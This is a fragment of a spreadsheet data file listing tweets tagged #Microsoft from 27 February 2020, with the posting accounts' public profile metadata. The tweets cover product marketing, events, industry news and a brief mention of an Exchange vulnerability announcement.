  </si>
  <si>
    <t>{'id': 2188027502, 'id_str': '2188027502', 'name': 'DIE WIENBURG.', 'screen_name': 'die_wienburg', 'location': 'MÃ¼nster, DE', 'description': 'IT news &amp; updates - daily | #Office365 #Microsoft365 \n#DigitaleBildung #DigitalTransformation | about: https://t.co/RFdb4Lgdkb', 'url': 'https://t.co/LQvfY2u9aQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/LQvfY2u9aQ', 'expanded_url': 'http://www.die-wienburg.com', 'display_url': 'die-wienburg.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/RFdb4Lgdkb', 'expanded_url': 'http://www.die-wienburg.eu/p/impressum.html', 'display_url': 'die-wienburg.eu/p/impressum.htâ€¦', 'indices': [103, 126]}]}}, 'protected': False, 'followers_count': 16215, 'friends_count': 15598, 'listed_count': 188, 'created_at': 'Mon Nov 11 09:18:06 +0000 2013', 'favourites_count': 6603, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 45590,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'http://pbs.twimg.com/profile_images/1141579184273285120/oYUiKWgq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141579184273285120/oYUiKWgq_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2188027502/1561007890',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</si>
  <si>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11:13:46 +0000 2020</t>
  </si>
  <si>
    <t>anybody else notice that all girls in ISS has a certain profile and characteristics. #thing1and2 #microgravity #microsoft https://t.co/xfUdK0QujD</t>
  </si>
  <si>
    <t>{'id': 1198176016981610496, 'id_str': '1198176016981610496', 'name': 'ManUpdowns', 'screen_name': 'ManUpdowns', 'location': '', 'description': 'Keeping true to Man and self. MY grandma Mary left Mormonville for Scientology and TV time.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 167, 'listed_count': 0, 'created_at': 'Sat Nov 23 09:46:49 +0000 2019', 'favourites_count': 79, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3337, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228900598113636353/msJyp6Fh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228900598113636353/msJyp6Fh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1198176016981610496/1583396311',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</si>
  <si>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11:13:24 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to administer, configure, and produce/deliver Microsoft Teams Live Events today at 12 noon eastern! - Join us for the Microsoft Teams Live Events Webcast! #Microsoft #MicrosoftTeams #microsoftstream  https://t.co/n9k5ZlbfRL</t>
  </si>
  <si>
    <t>Thu Feb 27 11:13:16 +0000 2020</t>
  </si>
  <si>
    <t>Have questions on #WVD #MEM (or even #SCCM if you prefer...) #MSIntune, #Windows10 or #Security? Or perhaps all of them? Come by table 3 in the #Microsoft showcase at #MSIgniteTheTour in #Copenhagen and I'm happy to show and tell! #kneedeepintech #Truesec #MVPBuzz https://t.co/xozayXXXKw</t>
  </si>
  <si>
    <t>{'id': 480268788, 'id_str': '480268788', 'name': 'Simon Binder', 'screen_name': 'Bindertech', 'location': 'LinkÃ¶ping', 'description': 'Microsoft MVP - Enterprise Mobility. Principal Technical Architect @ Truesec. All tweets are my, and not my employers, view on things. Penguins Rock!', 'url': 'https://t.co/NvNUUWxQtR', 'entities': {'url': {'urls': [{'url': 'https://t.co/NvNUUWxQtR', 'expanded_url': 'https://kneedeepintech.com', 'display_url': 'kneedeepintech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2074, 'friends_count': 767, 'listed_count': 157, 'created_at': 'Wed Feb 01 09:28:10 +0000 2012', 'favourites_count': 26719, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14806,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'http://pbs.twimg.com/profile_images/1181212895486586880/EV6O3rZM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181212895486586880/EV6O3rZM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/480268788/1574144179',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</si>
  <si>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11:10:14 +0000 2020</t>
  </si>
  <si>
    <t>Did you ever think you'd see Nick Wallace, Commercial Director at @Azure on stage at #Oracle #OpenWorld? 
Nick was discussing compatibility between various softwares. #OOWLON  #Microsoft #tech #technology #talenterprize https://t.co/EE0onwZZ8g</t>
  </si>
  <si>
    <t>Thu Feb 27 11:09:24 +0000 2020</t>
  </si>
  <si>
    <t>Year of the Nurse &amp;amp; Midwife Episode 1 - Microsoft Tech Community #Microsoft #healthcare #lifesciences #people #nurse #midwife  https://t.co/Kw9tUHg1Oh</t>
  </si>
  <si>
    <t>Thu Feb 27 11:06:50 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> NEWS  #torrentfreak #microsoft #censorship #deleteGithub  #DMCA Notices Took Down 14,320 Github Projects in 2019 https://t.co/d0BZD1I4eX</t>
  </si>
  <si>
    <t>Thu Feb 27 11:04:51 +0000 2020</t>
  </si>
  <si>
    <t>Making a smart move is preparing for a remarkable journey. You have a reason to be where you are today. Your perspective to virtualize the world starts with a single step. Make every moment count.
#virtualizeAfrica #vExpert #VMUGIlorin #MSP #Microsoft https://t.co/09St1EtfHf</t>
  </si>
  <si>
    <t>{'id': 830075759444295682, 'id_str': '830075759444295682', 'name': 'Kamaldeen #PayAsYouKnow #FSIHackathon', 'screen_name': 'kenkarmah', 'location': 'Everywhere ', 'description': '@malhubng (supporting innovation and technology advancement), organizer @kwarabuild, @GdgIlorin. Ambassador @vmw_vafrica @vExpert', 'url': 'https://t.co/fbaDDtCNhA', 'entities': {'url': {'urls': [{'url': 'https://t.co/fbaDDtCNhA', 'expanded_url': 'http://medium.com/@devyousefk', 'display_url': 'medium.com/@devyousefk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3073, 'friends_count': 2386, 'listed_count': 5, 'created_at': 'Fri Feb 10 15:27:37 +0000 2017', 'favourites_count': 9052, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3783, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218045608910643200/E2k0ZlSq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218045608910643200/E2k0ZlSq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/830075759444295682/1571047691',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</si>
  <si>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11:03:35 +0000 2020</t>
  </si>
  <si>
    <t>Hyper-V: Determine which NIC/network is being used for CSV communication with PowerShell
https://t.co/9zRUtlv2ih
#Microsoft #HyperV #PowerShell #blogpost https://t.co/mmQw2do0YC</t>
  </si>
  <si>
    <t>Thu Feb 27 11:02:52 +0000 2020</t>
  </si>
  <si>
    <t>Yakuza 0 | Xbox One Game Pass Launch Trailer
https://t.co/SHFjO39CwC #Yakuza0 #YakuzaZero #GamePass #XboxLive #XboxOneX #XboxOne #Xbox #Microsoft #deadarticgames</t>
  </si>
  <si>
    <t>{'id': 4354197195, 'id_str': '4354197195', 'name': 'DeadArtic Gamesâ„¢', 'screen_name': 'DeadarticGames', 'location': '', 'description': 'ðŸŽ® Videogames website ðŸŽ®                 https://t.co/zydyAFZWQu \nhttps://t.co/oh3t8Z3kww  \n                âœ‰contacto@deadarticgames.com', 'url': 'https://t.co/WC1z24Duj2', 'entities': {'url': {'urls': [{'url': 'https://t.co/WC1z24Duj2', 'expanded_url': 'http://www.deadarticgames.com', 'display_url': 'deadarticgames.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/zydyAFZWQu', 'expanded_url': 'http://instagram.com/deadarticgames/', 'display_url': 'instagram.com/deadarticgames/', 'indices': [39, 62]}, {'url': 'https://t.co/oh3t8Z3kww', 'expanded_url': 'http://facebook.com/deadarticgames/', 'display_url': 'facebook.com/deadarticgames/', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 4339, 'friends_count': 2926, 'listed_count': 34, 'created_at': 'Wed Dec 02 20:52:55 +0000 2015', 'favourites_count': 171, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4071,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'http://pbs.twimg.com/profile_images/684104058873982976/s1FZwCqH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/684104058873982976/s1FZwCqH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4354197195/1471951752',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</si>
  <si>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11:02:15 +0000 2020</t>
  </si>
  <si>
    <t>As a #healthcare professional we know you always strive to provide the best possible care for your patients, #Microsoft #Teams can free up more vital time with your patients. 
Find out more in our full infographic: https://t.co/1xGPPeAkEk https://t.co/2QvcqmY0LC</t>
  </si>
  <si>
    <t>Thu Feb 27 11:01:59 +0000 2020</t>
  </si>
  <si>
    <t>Visit our blog to learn more about the primary functions of Microsoft SQL Server. https://t.co/lmhTW70B7F #MicrosoftSQLServer #Microsoft #technews #technology</t>
  </si>
  <si>
    <t>{'id': 455108094, 'id_str': '455108094', 'name': 'tmb', 'screen_name': 'TmbGroup', 'location': 'Chatham/Colchester/Havant/London', 'description': 'Better technology for business. Fully managed IT support and services for SMEs, including cyber security and infrastructure.', 'url': 'https://t.co/OLgwVdBeeM', 'entities': {'url': {'urls': [{'url': 'https://t.co/OLgwVdBeeM', 'expanded_url': 'http://www.tmb.co.uk', 'display_url': 'tmb.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 593, 'friends_count': 473, 'listed_count': 10, 'created_at': 'Wed Jan 04 18:59:16 +0000 2012', 'favourites_count': 344, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1461,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'http://pbs.twimg.com/profile_images/1190182021479436289/kbpsKrwa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190182021479436289/kbpsKrwa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/455108094/1580830653',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</si>
  <si>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11:01:58 +0000 2020</t>
  </si>
  <si>
    <t>Transform #data into intelligent action. Less time, more value with #Microsoft #Cortana. Contact i2e Consulting to learn more. https://t.co/Hd608vRZum</t>
  </si>
  <si>
    <t>Thu Feb 27 11:01:48 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 11:01:26 +0000 2020</t>
  </si>
  <si>
    <t>How Diet, Exercise, and Weight Management Can Add a Decade to Your Life
https://t.co/d2PXtHwx2e
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #heathylifestyle #healthydiet</t>
  </si>
  <si>
    <t>Thu Feb 27 11:01:17 +0000 2020</t>
  </si>
  <si>
    <t>21 More ways to be productive with #Office365 Read our blog to find out more https://t.co/H4IK0uIZJE #Productivity #Microsoft #Business #Outlook #Office #ITSupport #ITServices #ComputerSupport #ComputerServices #Marketing</t>
  </si>
  <si>
    <t>Thu Feb 27 11:00:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announced a #vulnerability found on #Exchange Validation Key Remote Code Execution (CVE-2020-0688). Read more at https://t.co/8LClVakNjS</t>
  </si>
  <si>
    <t>{'id': 73014148, 'id_str': '73014148', 'name': 'Konstantinos Xanthopoulos', 'screen_name': 'archergr', 'location': 'Athens, Greece', 'description': 'Computer and football geek, husband &amp; father', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3660, 'friends_count': 4458, 'listed_count': 22, 'created_at': 'Thu Sep 10 01:58:30 +0000 2009', 'favourites_count': 1074, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7207, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFF04D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232044888872628231/RtHOLcD__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232044888872628231/RtHOLcD__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/73014148/1582577259', 'profile_link_color': '3B94D9',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</si>
  <si>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Thu Feb 27 11:00:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts newfound openness and transparency makes it easier for #SAP customers to trust #cloud platform #Azure. &amp;gt;&amp;gt; https://t.co/MccjSAq2Lq</t>
  </si>
  <si>
    <t>{'id': 707654406804733953, 'id_str': '707654406804733953', 'name': 'e3zine', 'screen_name': 'e3zine', 'location': 'Munich, Germany', 'description': 'e3zine is an independent news outlet, born in 2016, for SAP users, professionals, partners and consultants in the global economy and tech scene.', 'url': 'https://t.co/J6I6eGjWm5', 'entities': {'url': {'urls': [{'url': 'https://t.co/J6I6eGjWm5', 'expanded_url': 'http://www.e3zine.com', 'display_url': 'e3zine.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 774, 'friends_count': 458, 'listed_count': 32, 'created_at': 'Wed Mar 09 19:48:52 +0000 2016', 'favourites_count': 673, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6246,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'http://pbs.twimg.com/profile_images/963025675388112896/mokskyGc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/963025675388112896/mokskyGc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/707654406804733953/1480511234', 'profile_link_color': 'A71511',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</si>
  <si>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11:00:05 +0000 2020</t>
  </si>
  <si>
    <t>100X100X100 will bring together 100 companies and 100 early and growth-stage #startups - #Microsoft #B2B #India #SaaS https://t.co/TIVkQiQJlb #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Feb 27 10:59:59 +0000 2020</t>
  </si>
  <si>
    <t>Azure Bastion is a service which enables you to have private and fully managed RDP and SSH access to your Azure virtual machines. 
https://t.co/yEE2IyOwKw
#azure #bastion #microsoft #virtualmachines #VMs #RDP #SSH #azureportal #windows #linux</t>
  </si>
  <si>
    <t>{'id': 2859630055, 'id_str': '2859630055', 'name': 'Successive Technologies', 'screen_name': 'SuccessiveSoft', 'location': 'Noida', 'description': 'Breaking the digital barriers, pushing beyond innovation.', 'url': 'https://t.co/cZTxkLOYhv', 'entities': {'url': {'urls': [{'url': 'https://t.co/cZTxkLOYhv', 'expanded_url': 'http://successive.tech', 'display_url': 'successive.tech', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 89, 'friends_count': 21, 'listed_count': 4, 'created_at': 'Fri Oct 17 06:24:15 +0000 2014', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 592,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'http://pbs.twimg.com/profile_images/1085512549007794176/RxbecR-A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085512549007794176/RxbecR-A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2859630055/1573115095',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</si>
  <si>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10:58:19 +0000 2020</t>
  </si>
  <si>
    <t>Developing https://t.co/dW3MwdtUuY MVC 5 Web Applications training course teaches attendees how to develop advanced https://t.co/dW3MwdtUuY Core MVC applications using. NET Core tools and technologies. #Microsoft #LearningPatner #coding #codinglife #Namibia https://t.co/sIywG5QWwz</t>
  </si>
  <si>
    <t>Thu Feb 27 10:54:48 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft is forecasting the global business applications market to reach over $173bn by 2020 with ISVs owning 57% or $99bn of this market. This represents an enormous opportunity for ISVs focused across vertical specific business applications requirements.
#microsoft #Solgari https://t.co/6LAFFd5Szc</t>
  </si>
  <si>
    <t>Thu Feb 27 10:54:11 +0000 2020</t>
  </si>
  <si>
    <t>5/ "Unlike #Apple, #Microsoft does not sell much in #China, and the market accounts for less than 2% of the companys revenue. While its Windows and Office products are used in China, the software is often #pirated."</t>
  </si>
  <si>
    <t>{'id': 1444799468, 'id_str': '1444799468', 'name': 'Stephen Loynd', 'screen_name': 'loyndsview', 'location': 'Washington, DC, USA', 'description': 'Analyst &amp; speaker at TrendzOwl // Observing the information &amp; communications revolution spreading across the planet', 'url': 'https://t.co/NndiZuZsLA', 'entities': {'url': {'urls': [{'url': 'https://t.co/NndiZuZsLA', 'expanded_url': 'http://www.trendzowl.com', 'display_url': 'trendzowl.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1490, 'friends_count': 1470, 'listed_count': 577, 'created_at': 'Mon May 20 21:13:00 +0000 2013', 'favourites_count': 11831, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25533,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'http://pbs.twimg.com/profile_images/1180985152056565762/3IlchmIP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180985152056565762/3IlchmIP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1444799468/1570403777', 'profile_link_color': '0084B4',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</si>
  <si>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4/ "#Personalcomputing, which includes hardware sales as well as #Windows installed on computers that other companies produce and sell, accounts for roughly a third of #Microsofts revenue."</t>
  </si>
  <si>
    <t>Thu Feb 27 10:54:10 +0000 2020</t>
  </si>
  <si>
    <t>3/ 'When bellwethers like #Microsoft come out and talk about the #supplychain and how it will negatively impact PC demand, it fans the flames of some of the worries out there for the broader supply chain.'"</t>
  </si>
  <si>
    <t>'Although we see strong Windows demand in line with our expectations, the #supplychain is returning to normal operations at a slower pace than anticipated,' the company said in a statement."
https://t.co/tJEeF2f5cY #Microsoft #China #coronavirus</t>
  </si>
  <si>
    <t>Thu Feb 27 10:53:05 +0000 2020</t>
  </si>
  <si>
    <t>So its still not 100% accurate but really like insights in outlook, it makes things a little easier for me to manage #outlook #insights #microsoft #Microsoft365</t>
  </si>
  <si>
    <t>{'id': 7065712, 'id_str': '7065712', 'name': 'Andrew Kemp', 'screen_name': 'andrew_kemp', 'location': 'Edinburgh, Scotland', 'description': 'Senior Office 365 Technical Consultant @ Microsoft. Cyclist, Amateur Photographer, dance dad, gymnastics dad and a dads taxi service! My thoughts are my own', 'url': 'https://t.co/jQCQCiRPMA', 'entities': {'url': {'urls': [{'url': 'https://t.co/jQCQCiRPMA', 'expanded_url': 'http://www.kemponline.co.uk', 'display_url': 'kemponline.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 401, 'friends_count': 437, 'listed_count': 15, 'created_at': 'Mon Jun 25 09:21:32 +0000 2007', 'favourites_count': 383, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6003,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'http://pbs.twimg.com/profile_images/1225184813734219777/k4tbHWvT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225184813734219777/k4tbHWvT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/7065712/1571746277',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</si>
  <si>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10:52:34 +0000 2020</t>
  </si>
  <si>
    <t>Meet Nilesh Yawalkar , Cloud Solution Artchitect, Microsoft Corporation at IAMCP members meeting - Ahmedabad Chapter.
Nilesh will speak on " Microsoft 365 - Security Compliance and Partner Opportunities".
Register Now: https://t.co/Ajbb8H4ME4
#iamcp #microsoft #mspartner https://t.co/t8iMqDOnec</t>
  </si>
  <si>
    <t>Thu Feb 27 10:52:33 +0000 2020</t>
  </si>
  <si>
    <t>@webmink @zoobab @OpenSourceOrg Since #microsoft bought shares in OSI Microsoft has continued to attack Linux with #swpats e.g. https://t.co/pIFxoN1GSO</t>
  </si>
  <si>
    <t>Thu Feb 27 10:51:59 +0000 2020</t>
  </si>
  <si>
    <t>India: New regulations tough on foreign firms  like Microsoft, Google, Twitter, etc.
Big Tech's honeymoon with the world's second-largest internet market is ending
https://t.co/1S2PmEKpQ5
#India #technology #TechNews #Microsoft #Google #Twitter #reforms</t>
  </si>
  <si>
    <t>{'id': 313814270, 'id_str': '313814270', 'name': 'Syed Atique Hussain', 'screen_name': 'AtiqueNaqvi', 'location': 'Dubai, United Arab Emirates', 'description': "Works in media and communications industry. Expertise include Thought Leadership, Editing &amp; Reporting (20 years). Attended 7 WEF's Davos Summits.", 'url': 'https://t.co/WEUjdXpJV0', 'entities': {'url': {'urls': [{'url': 'https://t.co/WEUjdXpJV0', 'expanded_url': 'http://atiquehussain.blogspot.com', 'display_url': 'atiquehussain.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 317, 'friends_count': 481, 'listed_count': 29, 'created_at': 'Thu Jun 09 07:54:55 +0000 2011', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2029,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'http://pbs.twimg.com/profile_images/1234747994437758977/uSXWwC3m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234747994437758977/uSXWwC3m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/313814270/1417480182',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</si>
  <si>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Feb 27 10:51:41 +0000 2020</t>
  </si>
  <si>
    <t>Where does your University sit in Sustainability https://t.co/bXJ21ORtzS #infosys #microsoft #smartcampus</t>
  </si>
  <si>
    <t>{'id': 14831917, 'id_str': '14831917', 'name': 'alec boere', 'screen_name': 'alecboere', 'location': 'London', 'description': 'Helping land tech to make the world a better place for brands', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 396, 'friends_count': 577, 'listed_count': 56, 'created_at': 'Mon May 19 12:50:55 +0000 2008', 'favourites_count': 147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1108,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'http://pbs.twimg.com/profile_images/529398791288659968/pHTxlS47_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/529398791288659968/pHTxlS47_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14831917/1399460352', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Feb 27 10:51:31 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has updated its very good #ToDo app for #iOS. Very powerful tool that synchronises effortlessly across devices | #AppleSupport  https://t.co/ZezbOcKKDj</t>
  </si>
  <si>
    <t>{'id': 344871914, 'id_str': '344871914', 'name': 'Keith Burton', 'screen_name': 'keithburton16', 'location': 'Basingstoke, England', 'description': '@MSFTMechanics @AppleSupport pro. @MINI enthusiast. @BBCDoctorWho fan. @Giants @ChelseaFC supporter. Founder and admin of @NYGiantsFansUK. VIEWS MY OWN', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 280, 'friends_count': 39, 'listed_count': 310, 'created_at': 'Fri Jul 29 18:28:23 +0000 2011', 'favourites_count': 145, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 16506,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'http://pbs.twimg.com/profile_images/1226946175623946240/Wg170Uwi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226946175623946240/Wg170Uwi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/344871914/1568753614',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</si>
  <si>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10:51:30 +0000 2020</t>
  </si>
  <si>
    <t>Since #microsoft bought shares in OSI Microsoft has continued to attack Linux with #swpats e.g. https://t.co/pIFxoN1GSO</t>
  </si>
  <si>
    <t>Thu Feb 27 10:48:17 +0000 2020</t>
  </si>
  <si>
    <t>Just migrated an internal Scheduled Task to #Azure #WebJobs #AppServices #dotnet! Moving to #Cloud! #Microsoft #SimpleSolution https://t.co/Fa9xIpz6G5</t>
  </si>
  <si>
    <t>{'id': 2212532222, 'id_str': '2212532222', 'name': 'Thomas Kurth | MVP', 'screen_name': 'ThomasKurth_ch', 'location': 'Switzerland', 'description': '#MEMCM, #MEM, #ConfigMgr, #Intune, #AzureAD, #ModernWorkplace and #Security enthusiast working at @baseVISION. Awarded as Microsoft MVP Enterprise Mobility', 'url': 'https://t.co/kGKebCft9s', 'entities': {'url': {'urls': [{'url': 'https://t.co/kGKebCft9s', 'expanded_url': 'https://wpninjas.ch/', 'display_url': 'wpninjas.ch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1015, 'friends_count': 1186, 'listed_count': 45, 'created_at': 'Sun Nov 24 14:04:16 +0000 2013', 'favourites_count': 2443, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3325,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'http://pbs.twimg.com/profile_images/760218056618639360/AcdANSAe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/760218056618639360/AcdANSAe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2212532222/1554480603',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</si>
  <si>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10:46:50 +0000 2020</t>
  </si>
  <si>
    <t>Qualifications: BEng in Electrical and #Electronics #Engineering, BEng in Computer Engineering, BSC in #Computer Engineering, BSc in Physics Electronics, and related field. #Microsoft Certified IoT #developer #Certification will be an added advantage. https://t.co/mMVAEIrfvK</t>
  </si>
  <si>
    <t>{'id': 1078308902717087745, 'id_str': '1078308902717087745', 'name': 'TelnetHR', 'screen_name': 'telnethr', 'location': 'Lagos, Nigeria', 'description': 'The Human Resources Team of Telnet Group, a world-class technology-enabled business solutions provider in Nigeria.', 'url': 'https://t.co/Pa51xZEbLG', 'entities': {'url': {'urls': [{'url': 'https://t.co/Pa51xZEbLG', 'expanded_url': 'http://telnetng.com/careers', 'display_url': 'telnetng.com/careers', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 104, 'friends_count': 82, 'listed_count': 0, 'created_at': 'Thu Dec 27 15:17:31 +0000 2018', 'favourites_count': 218, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 176,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'http://pbs.twimg.com/profile_images/1079358079500800000/OSaamUE2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1079358079500800000/OSaamUE2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1078308902717087745/1546940699',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</si>
  <si>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10:46:05 +0000 2020</t>
  </si>
  <si>
    <t>@IndLeaders @OliverAndrew13  Wow I have never seen this photo before. Apple (Steve Jobs) and Microsoft (Bill Gates) sitting &amp;amp; talking like they were best friends. On the Left Side: 'Technology Creator'. On the Right Side: 'Technology Developer.' Geoff. #LinkedIn #Apple #SteveJobs #Microsoft #BillGates https://t.co/PuuF34ni49</t>
  </si>
  <si>
    <t>{'id': 1230289940396662785, 'id_str': '1230289940396662785', 'name': 'Geoffrey Cole', 'screen_name': 'MrGeoffreyCole1', 'location': '', 'description': 'I grew up in Foster (South Gippsland) &amp; I am now living in Traralgon (Victoria), Australia. My hobbies are: Art, Lawn Bowls, Music, Science &amp; World History.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 364, 'friends_count': 5001, 'listed_count': 1, 'created_at': 'Thu Feb 20 00:37:12 +0000 2020', 'favourites_count': 983, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 816, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230296971346202625/ByUDkj9B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230296971346202625/ByUDkj9B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230289940396662785/1582588421',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</si>
  <si>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10:45:19 +0000 2020</t>
  </si>
  <si>
    <t>Dell Commercial Client systems training: #Latitude, #Optiplex, #Vostro and #Precision Workstations - including #Microsoft training for Windows and Office. Contact us for your proposal today https://t.co/vOUcWogFye https://t.co/XlAuMnCtHQ</t>
  </si>
  <si>
    <t>{'id': 1534214426, 'id_str': '1534214426', 'name': 'Jo Worf', 'screen_name': 'joworf', 'location': 'Mainz-Bingen, Rheinland-Pfalz', 'description': '#DellEMC Global Customer Success Lead, EdServices #DellEMCElect 2017, #Iwork4Dell, #CEdMA Board|Love playing tennis. Member of FSV #Mainz05.Tweets are my own...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 551, 'friends_count': 781, 'listed_count': 232, 'created_at': 'Thu Jun 20 15:29:38 +0000 2013', 'favourites_count': 3520, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6168,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'http://pbs.twimg.com/profile_images/931468060845731840/i5wyw531_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/931468060845731840/i5wyw531_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1534214426/1510914624',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</si>
  <si>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10:45:15 +0000 2020</t>
  </si>
  <si>
    <t>Ex-Microsoft Engineer Used Bitcoin to Help Embezzle Millions From Tech Giant https://t.co/yn5i0959L7 via @coindesk #CryptoNews #Crypto #cryptocurrency #cryptocurrencies #altcoins #Bitcoin #BTC #cryptotwitter #moneylaundering #Microsoft #Crypto2020</t>
  </si>
  <si>
